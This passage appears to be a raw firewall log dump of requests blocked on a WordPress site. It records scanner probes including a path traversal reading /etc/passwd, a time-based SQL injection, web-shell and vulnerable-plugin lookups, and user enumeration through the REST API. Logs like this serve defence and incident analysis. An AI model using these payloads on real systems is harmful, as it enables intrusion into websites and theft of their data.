Safari\\/537.36\"}','Zk5KbHmhDwgprCtyTBjsIueY',0,1672819779.3160,120,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','Tc2Fh8yxPtMA1jBpoEV6KHmO',0,1672819779.3291,137,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-json/am-member/license','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/40.0.2214.93 Safari\\/537.36\"}','3ehRi8Ur4c7MI0QxZJK1uLgm',0,1672819779.4019,110,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn)','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/34.0.1847.137 Safari\\/4E423F\"}','Ymi4lqHskwrgCX5pZ01DPuN8',0,1672819779.3959,144,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=uploadFontIcon','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','YJmkC2PyOHRXshQB17FV3Kaf',0,1672819779.4819,137,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/index.php?rest_route=/xs-donate-form/payment-redirect/3','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2820.59 Safari\\/537.36\"}','ugejcTwZiBJxSYhCo7fNAlq0',0,1672819779.5880,124,'','GET',403,0,520,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2062.124 Safari\\/537.36\"}','utaPdAg8lXFwGQMBS3Up17Wy',0,1672819779.5893,173,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/uploads/workreap-temp/2JqyAnESoxJ6EDOcoI14Edbk35e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.67 Safari\\/537.36\"}','3ikaCs5YnPTrBHvJ4tR2eLNX',0,1672819780.1357,171,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2866.71 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk:443\\/favicon.ico\"}','Sxka76ZNrDleEiYWt8jyqO40',0,1672819780.8516,88,'','POST',404,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php?action=easync_success_and_save','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','p2wEnTCAUg80fuVbcJQYzyti',0,1672819780.9674,134,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2762.73 Safari\\/537.36\"}','DtzFv926wqmZOPueJs7VGdbl',0,1672819781.0008,139,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-upload-engine.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','TpcWDEgyRxHX79fZA0mGP64n',0,1672819780.9878,162,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','2UYikIZbRwp7cKmMEg1zvXsH',0,1672819781.0473,155,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.2117.157 Safari\\/537.36\"}','asoZm8lrWtT7zqSGRHpX4v6w',0,1672819781.0000,213,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-post.php?vrc_cmd=phpinfo','','{\"1\":\"Mozilla\\/5.0 (X11; OpenBSD i386) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','mw1cDraWvINTnuQHJZ3s89OA',0,1672819781.1142,229,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/simple-file-list/ee-file-engine.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 4.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','6RD2kWZTMJQdvxqbSigNao48',0,1672819781.3448,155,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/uploads/simple-file-list/nuclei.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','TFoz8A16dcfueIDLE5KyPrVl',0,1672819781.7480,107,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','NxgEOQs9fVWTrCUAXoZt5liR',0,1672819782.4091,165,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/uploads/kaswara/fonts_icon/kaqnqd/io.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.3319.102 Safari\\/537.36\"}','56UZjlaY2QpChPoRNBEOsxmk',0,1672819784.3952,99,'','GET',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.4; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','4lSbTwn9IB0fkRtQgFycLdZm',0,1672819784.3952,150,'','POST',403,0,700,0,1,'',0),('185.65.134.165',3108079269,'','https://yorkshirecricketboard.org.uk/favicon.ico/wp-content/uploads/2JqyBN6shlQ1XXbI8dfpRwivMbA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/37.0.2049.0 Safari\\/537.36\"}','sjgRyd3ZYzInrMJBAOb9o4VS',0,1672819784.7742,139,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wp-content/uploads/zcache.php','','{\"1\":\"Linux Mozilla\"}','7DL6Q13tOkaNsgo8fvZTJ2Be',0,1672821976.8399,105,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wp/wp-content/uploads/zcache.php','','{\"1\":\"Linux Mozilla\"}','iNRCeJqOwPEZcu4yWmnVsfUM',0,1672821977.4621,107,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wordpress/wp-content/uploads/zcache.php','','{\"1\":\"Linux Mozilla\"}','EjcF2tuT6W4DGPBrlA9v7xdZ',0,1672821977.8653,150,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/blog/wp-content/uploads/zcache.php','','{\"1\":\"Linux Mozilla\"}','VKujOXry8fQTEGSqtNkhicx5',0,1672821978.4906,101,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/site/wp-content/uploads/zcache.php','','{\"1\":\"Linux Mozilla\"}','oG38HEgrYkChwBjqRlMA2TxF',0,1672821979.0614,137,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wp-includes/customize/class-wp-customize-nav-menu-locations-controll.php?send=ok','','{\"1\":\"Linux Mozilla\"}','R2XwqQmvTDMxeaf7APoB01YC',0,1672821980.1801,118,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wp/wp-includes/customize/class-wp-customize-nav-menu-locations-controll.php?send=ok','','{\"1\":\"Linux Mozilla\"}','zvrDx3GXijVtYMnqWdN7Hsk1',0,1672821980.5212,84,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/wordpress/wp-includes/customize/class-wp-customize-nav-menu-locations-controll.php?send=ok','','{\"1\":\"Linux Mozilla\"}','X8VSOgNZ94oWkqzYpHlMx1aQ',0,1672821980.8505,110,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/blog/wp-includes/customize/class-wp-customize-nav-menu-locations-controll.php?send=ok','','{\"1\":\"Linux Mozilla\"}','tgqu0NEHQVonJBzaxyP8cebI',0,1672821981.2624,97,'','GET',403,0,700,0,1,'',0),('20.250.41.226',351939042,'','https://yorkshirecricketboard.org.uk/site/wp-includes/customize/class-wp-customize-nav-menu-locations-controll.php?send=ok','','{\"1\":\"Linux Mozilla\"}','x1gIJvY4LG6PoXFwjeEshpyM',0,1672821981.5357,97,'','GET',403,0,700,0,1,'',0),('81.88.53.43',1364735275,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','sNdDKok4AhxlQtZpCRI0fSFg',0,1672824174.4256,303,'','POST',403,0,600,0,1,'',0),('182.135.116.238',3062330606,'','https://yorkshirecricketboard.org.uk/editor/login_admin.asp','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/editor\\/login_admin.asp\"}','XchjQ3so20AntUalqR6eWgYL',0,1673478988.3687,119,'','GET',403,0,700,0,1,'',0),('125.65.228.200',2101470408,'','https://yorkshirecricketboard.org.uk/ewebeditor/login_admin.asp','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/ewebeditor\\/login_admin.asp\"}','bnuSN5K3TvY0iAWxaE1UlByC',0,1673478990.9419,127,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7qnKhMSxmPyb3aTuE5c0RfZU',0,1673491744.8205,2220,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OWAflKz5ZPQpHV6CM7adygot',0,1673491748.1290,91,'','GET',403,0,700,0,1,'',0),('171.217.250.11',2883189259,'','https://yorkshirecricketboard.org.uk/eweb/login_admin.asp','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/eweb\\/login_admin.asp\"}','BmzgxKvc3jRTWNOEw6HZnbhJ',0,1673514618.6071,110,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/about.PHP7','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','bo14ZsDNUQJLHm2nKzqXvEud',0,1673537220.0796,984,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https://yorkshirecricketboard.org.uk/about.PHP7','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','sxKBvHdzXy7cMYLOPVNjUaZ1',0,1673537222.5301,115,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','n9wv1lqghHDZBxUVud3E4eGL',0,1673564635.0947,114,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-admin/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','YXdJawx2IBWLbOM1outqFs9e',0,1673564635.7164,99,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GYU5IKcATyOt7B2x9VeSpXQu',0,1673564636.0416,152,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VeAgqokBUPyJrfbKOiITHFn8',0,1673564636.5119,95,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-includes/wp-includes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qYZHRuAP6w3slocSzEBib8GI',0,1673564636.7654,132,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','XjM8gvaT4eF6oBcDnOwfukqI',0,1673564637.0155,128,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HdEvNYXTrC5PMKyc1nJA0Ugu',0,1673564638.2696,88,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Up4PiGO1FLCVkQNK5uysM8Jm',0,1673564639.6579,113,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OxvnHl8Ft47ZuMmzIcNCaRKD',0,1673564640.6866,101,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','NDfkFxcJgOvVCTS8bMuPle76',0,1673564641.4020,98,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','JKPa0sBIYWLO6Vb2fQwin31U',0,1673564642.8147,102,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','qdPOEloLbRW7DcFN5stXKij2',0,1673564643.0113,112,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Kr6p2mZcF0hVvRwD4MIiek9H',0,1673564643.5293,99,'','GET',403,0,700,0,1,'',0),('94.23.216.120',1578621048,'','https://yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','kmSQlOaDEYz5ibZv2swn08W9',0,1673564643.7698,120,'','GET',403,0,700,0,1,'',0),('116.211.9.24',1959987480,'','https://yorkshirecricketboard.org.uk/fonts.googleapis.com','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko\\/20100101 Firefox\\/93.0\",\"2\":\"https:\\/\\/www.ipbuf.com\\/static\\/pdns\\/ipv4\\/yorkshirecricketboard.org.uk\\/index.html\"}','FMamD5AsEyRSxlhJ8zV3kOct',0,1673566231.0841,109,'','HEAD',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5agnwSNd7lYTHbRtFy1qpJcE',0,1673581114.9678,211,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-admin/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','zYkJWcRg1moxLlNfpGIB3yS4',0,1673581115.9722,97,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','i7a6ZDwkh9b50A3YX4KxBuQo',0,1673581116.6932,94,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','CfZi61LoNghGxpHlqKWDkemP',0,1673581117.6243,135,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-includes/wp-includes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','v8VklJ1mc6I7fyUZpD5swuXC',0,1673581118.3854,95,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','YkvJGmHWEt2czaA9XlxKOIn7',0,1673581119.3281,105,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-admin/js/widgets/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QPMaymElpjBRWIb8q34X6itY',0,1673581120.0755,149,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/nf_tracking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','mXRc5ApNJtQaOfdL36kviKhC',0,1673581120.8492,91,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dBfDe1xFv8HZT6N3AJPXbq5U',0,1673581121.6546,100,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VsI9WfS53ZGcAUEQyCtzH4iL',0,1673581122.4015,94,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/wp-light/wp-light.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','nJ1C9baY23qMKtAQ5DHLIT4o',0,1673581125.3033,109,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/networker/networker.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uy3PxG1T4SNJCDmaUtp7RZhs',0,1673581126.0276,211,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','L8TC6UZJmDvuRXWhpdjGcF2K',0,1673581126.8575,145,'','GET',403,0,700,0,1,'',0),('185.255.89.45',3120519469,'','https://yorkshirecricketboard.org.uk/wp-content/themes/classic/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bCA48EJe6Xt0Z9P3SWpMQG5w',0,1673581127.6745,112,'','GET',403,0,700,0,1,'',0),('185.165.116.21',3114628117,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\",\"2\":\"http:\\/\\/yorkshirecricketboard.org.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','oZvQ4OAVp7MxdeXl0WwFhs9q',0,1673637635.6483,123,'','GET',403,0,520,0,1,'',0),('178.17.171.102',2987502438,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','0B4MpxmXrckIsWEjnP6eUaoi',0,1673639064.4893,101,'','GET',403,0,520,0,1,'',0),('104.244.73.136',1760840072,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko\\/20100101 Firefox\\/77.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','npYtZ1d52WO0T3sQjmkBMiql',0,1673639066.2255,103,'','GET',403,0,520,0,1,'',0),('23.128.248.30',394328094,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','v7LrEMjYlyCPh183XI2WD0cq',0,1673639067.9774,131,'','GET',403,0,520,0,1,'',0),('109.70.100.88',1833329752,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','cvPwoG5kygEqpKnztObe6Iij',0,1673639069.4487,111,'','GET',403,0,520,0,1,'',0),('185.220.101.13',3118228749,'','https://yorkshirecricketboard.org.uk/wp-json/wp/v2/users/5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko\\/20100101 Firefox\\/53.0\",\"2\":\"https:\\/\\/yorkshirecricketboard.org.uk\\/\"}','cC6mvbl5w4TMxojLhAGae1uf',0,1673639070.7818,110,'','GET',403,0,520,0,1,'',0),('110.190.179.213',1857991637,'','https://yorkshirecricketboard.org.uk/m/apache.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\\/7.0; SLCC2; .NET 